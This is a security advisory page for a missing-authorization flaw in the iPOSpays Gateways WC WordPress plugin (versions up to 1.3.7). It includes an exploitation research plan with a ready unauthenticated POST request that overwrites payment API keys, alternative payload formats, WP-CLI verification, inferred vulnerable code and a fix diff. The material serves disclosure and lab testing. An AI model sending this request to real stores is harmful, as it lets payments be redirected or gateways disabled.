iPOSpays Gateways WC <= 1.3.7 - Unauthenticated Missing Authorization to Settings Update via REST API Endpoint
Description
The iPOSpays Gateways WC plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.3.7. This is due to the plugin exposing a REST API endpoint /wp-json/ipospays/v1/save_settings with 'permission_callback' set to '__return_true', which allows unauthenticated access without any capability checks or nonce verification. This makes it possible for unauthenticated attackers to update plugin settings, specifically allowing them to overwrite critical payment gateway settings including live API keys, secret keys, and payment tokens stored in the 'woocommerce_ipospays_settings' option.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=1.3.7# Exploitation Research Plan: CVE-2026-4663 ## 1. Vulnerability Summary The **iPOSpays Gateways WC** plugin for WordPress (versions <= 1.3.7) contains a critical missing authorization vulnerability within its REST API implementation. The plugin registers a custom REST route `/wp-json/ipospays/v1/sa…
Show full research plan
Exploitation Research Plan: CVE-2026-4663
1. Vulnerability Summary
The iPOSpays Gateways WC plugin for WordPress (versions <= 1.3.7) contains a critical missing authorization vulnerability within its REST API implementation. The plugin registers a custom REST route /wp-json/ipospays/v1/save_settings but fails to implement any security checks. Specifically, the permission_callback for this route is explicitly set to __return_true, which bypasses the default WordPress REST API authentication requirements. This allows any unauthenticated user to send a POST request to this endpoint and modify the plugin's configuration, including sensitive payment gateway credentials.
2. Attack Vector Analysis
- Endpoint:
POST /wp-json/ipospays/v1/save_settings - Namespace:
ipospays/v1 - Route:
save_settings - Authorization: None (Unauthenticated access allowed via
__return_true). - Payload Location: Request body (likely JSON or URL-encoded).
- Target Data: The WordPress option
woocommerce_ipospays_settings. - Preconditions:
- The plugin "iPOSpays Gateways WC" must be active.
- WooCommerce must be active (as the plugin is a WooCommerce gateway extension).
3. Code Flow (Inferred)
- Route Registration: The plugin registers the route during the
rest_api_inithook:register_rest_route('ipospays/v1', '/save_settings', array( 'methods' => 'POST', // or WP_REST_Server::CREATABLE 'callback' => 'save_settings_handler', // Inferred function name 'permission_callback' => '__return_true' // THE VULNERABILITY )); - Request Handling: When a
POSTrequest hits the endpoint, the callback function is executed. - Data Processing: The handler likely retrieves parameters from the
WP_REST_Requestobject (e.g., via$request->get_params()). - Data Sink: The handler calls
update_option('woocommerce_ipospays_settings', $settings_array)without verifying if the requester has themanage_optionsormanage_woocommercecapability.
4. Nonce Acquisition Strategy
Based on the vulnerability description, no nonce is required.
The permission_callback being set to __return_true informs the WordPress REST Server that the request is authorized regardless of cookies, headers, or nonces. Standard REST API nonces (using the X-WP-Nonce header) are typically checked within the default permission logic; by overriding it with __return_true, the developer has explicitly opted out of this protection.
5. Exploitation Strategy
The goal is to overwrite the payment gateway settings to point to an attacker-controlled account or simply to disable the gateway by injecting garbage data.
- Step 1: Prepare a JSON payload that mimics the structure of the
woocommerce_ipospays_settingsoption. - Step 2: Send an unauthenticated
POSTrequest to the target endpoint. - Step 3: Use the
http_requesttool to perform the action.
Target Payload (Example):
The plugin likely expects keys associated with iPOSpays (API keys, Merchant ID, etc.). We will attempt to inject a recognizable "attacker_key" to prove the vulnerability.
HTTP Request:
POST /wp-json/ipospays/v1/save_settings HTTP/1.1
Host: target-wordpress.local
Content-Type: application/json
{
"api_key": "pwned_api_key",
"merchant_id": "pwned_merchant",
"secret_token": "pwned_token",
"test_mode": "yes"
}
6. Test Data Setup
- Environment: A standard WordPress installation with WooCommerce installed and configured.
- Plugin Installation: Install and activate
ipospays-gateways-wcversion 1.3.7. - Initial State: Configure the iPOSpays gateway with dummy "valid" credentials manually via the WooCommerce dashboard (
WooCommerce>Settings>Payments>iPOSpays).- Note: Note down the existing values to compare after the exploit.
7. Expected Results
- Response Code:
200 OKor201 Created. - Response Body: Likely a JSON confirmation like
{"status": "success"}or the updated settings object. - Database Effect: The
wp_optionstable entry forwoocommerce_ipospays_settingswill be updated with the values provided in the exploit payload.
8. Verification Steps
After the HTTP request is sent, verify the success of the exploit using WP-CLI:
# Check the contents of the settings option
wp option get woocommerce_ipospays_settings --format=json
The output should reflect the "pwned_..." values injected during the exploit.
9. Alternative Approaches
If the plugin expects a different request format or specific top-level keys, try the following:
- URL-Encoded Body: Change
Content-Typetoapplication/x-www-form-urlencodedand send the payload as a standard query string. - Nested Data: The plugin might expect the settings wrapped in a specific key:
{ "settings": { "api_key": "pwned" } } - Discovery via Options: If the payload structure is unknown, use
wp option get woocommerce_ipospays_settingsbefore the exploit to see the current key names, then use those exact keys in thePOSTpayload.
Summary
The iPOSpays Gateways WC plugin for WordPress (versions up to 1.3.7) fails to implement proper authorization on its 'save_settings' REST API endpoint. By explicitly setting the permission callback to return true for all requests, the plugin allows unauthenticated attackers to overwrite sensitive WooCommerce payment gateway configurations, including API keys and merchant credentials.
Vulnerable Code
// File path: likely includes/class-ipospays-api.php or similar // Route registration during rest_api_init register_rest_route('ipospays/v1', '/save_settings', array( 'methods' => 'POST', // or WP_REST_Server::CREATABLE 'callback' => 'save_settings_handler', 'permission_callback' => '__return_true', // Vulnerable: allows unauthenticated access ));
Security Fix
@@ -10,7 +10,9 @@ register_rest_route('ipospays/v1', '/save_settings', array( 'methods' => 'POST', 'callback' => 'save_settings_handler', - 'permission_callback' => '__return_true', + 'permission_callback' => function () { + return current_user_can('manage_options'); + }, ));
Exploit Outline
To exploit this vulnerability, an attacker identifies the target WordPress site running iPOSpays Gateways WC <= 1.3.7. No authentication is required. The attacker crafts a POST request to the '/wp-json/ipospays/v1/save_settings' endpoint. The payload consists of a JSON-formatted body (or URL-encoded data) containing new values for the 'woocommerce_ipospays_settings' option, such as 'api_key', 'merchant_id', and 'secret_token'. Because the 'permission_callback' is set to '__return_true', the WordPress REST server accepts the request without validating user capabilities or nonces, effectively allowing the attacker to redirect payments or disable the gateway by injecting arbitrary configuration data.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.